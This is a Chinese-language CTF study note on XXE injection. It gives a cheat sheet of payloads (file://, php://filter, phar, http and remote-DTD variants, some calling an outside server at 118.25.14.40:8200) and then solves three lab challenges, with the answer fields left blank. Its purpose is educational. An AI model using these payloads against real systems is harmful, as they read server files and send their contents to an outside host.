题记:
复制粘贴的一天
今天的重点是xxe漏洞,本地环境需要搭建服务器,可搭建云服务器,做题的重点反而是伪协议
各种常用语句的使用
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag.php">
]>
<note>
<info>&xxe;</info>
</note>
//file协议获取flag.php
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag.php">
]>
<note>
<info>&xxe;</info>
</note>
//php://filter获取flag.php
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "phar:///var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
]>
<note>
<info>&xxe;</info>
</note>
//phar伪协议获取flag,通常和文件上传、反序列化一起使用
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:./flag.php">
]>
<note>
<info>&xxe;</info>
</note>
//php://filter获取flag.php
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY name SYSTEM "http://127.0.0.1/flag.php">
]>
<note>
<name>&name;</name>
</note>
//http直接访问
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY % xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag.php">
<!ENTITY % get SYSTEM "http://118.25.14.40:8200/hack.dtd">
%get;
%text;
%send;
]>
<note>
<info>&data;</info>
</note>
//远程DTD加php://filter协议
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "data://text/plain;base64,PCFFTlRJVFkgJSBiIFNZU1RFTSAnaHR0cDovLzExOC4yNS4xNC40MDo4MjAwL2V4cC5kdGQnPg==">
%a;
%b;
]>
<test>
&hhh;
</test>
<!---
base64编码解密后"<!ENTITY % b SYSTEM 'http://118.25.14.40:8200/exp.dtd'>",意思是通过调用118.25.14.40:8200端口上exp.dtd文件
exp.dtd文件内容为<!ENTITY % hhh SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
总的而言这句xml编码的意思就是首先定义一个变量a,a的内容是执行base64编码内容,解码后,遇到变量b,b为远程执行exp.dtd文件,dtd内容为变量hhh,意思是读取flag文件内容。
运行顺序是a和b,hhh为dtd中的变量
-->
//远程DTD加data协议
第一题
思路:
直接读取
payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<note>
<info>&xxe;</info>
</note>
答案:
第二题
题目:
思路:
输入测试语句
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag.php">
]>
<note>
<info>&xxe;</info>
</note>
被过滤,测试大小写、实体编码等绕过仍报错,使用data、php://filter、file等协议绕过
payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=./flag.php">
]>
<note>
<info>&xxe;</info>
</note>
第三题
题目:
思路:
输入简单语句进行测试
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<note>
<info>&xxe;</info>
</note>
然后使用绕过进行测试
最后使用data伪协议和远程DTD结合的方式解答
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "data://text/plain;base64,PCFFTlRJVFkgJSBiIFNZU1RFTSAnaHR0cDovLzExOC4yNS4xNC40MDo4MjAwL2V4cC5kdGQnPg==">
%a;
%b;
]>
<test>
&hhh;
</test>
base64解密